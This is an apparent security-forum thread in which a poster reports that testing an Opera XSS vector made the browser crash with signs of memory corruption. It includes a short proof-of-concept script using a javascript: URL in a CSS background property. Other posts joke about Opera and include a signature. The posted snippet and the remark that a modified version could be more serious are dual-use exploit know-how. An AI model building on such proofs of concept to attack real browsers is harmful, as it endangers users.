If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on).
Even though we all LOVE Opera for having lots and lots of XSS vectors that don't work on any other browser.. I just got up out of bed at 3am thinking I found a way of "avoiding" Opera executing the background:url(''); XSS vector.. and guess what.. it crashed with signs of memory corruption (unless it's normal to have EAX pointing to 0x006a0061, that is "ja", and to 0x004a0041, that is "JA", depending on whether the payload starts with javascript: or JAVASCRIPT:)
The awesome POC is:
<script>
var style="font-family:courier;background:url('javascript:123');";
window.a=document.createElement("a");
a.setAttribute("style",style);
alert(a.style.background);
</script>
So, now I don't even assume Opera is gonna fix it, I'll just assume it's another feature.. I mean, they did Opera Unite, didn't they?
That particular PoC doesn't seem to be, but if it was modified slightly then maybe it could be more serious.
------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]
Just stopping in to say, quickly, I stopped using Opera the moment they put Opera Unite into their beta. For those that remember me, kind of a big deal for me to stop. Lol.
Kyran Wrote:
-------------------------------------------------------
> Just stopping in to say, quickly, I stopped using
> Opera the moment they put Opera Unite into their
> beta. For those that remember me, kind of a big
> deal for me to stop. Lol.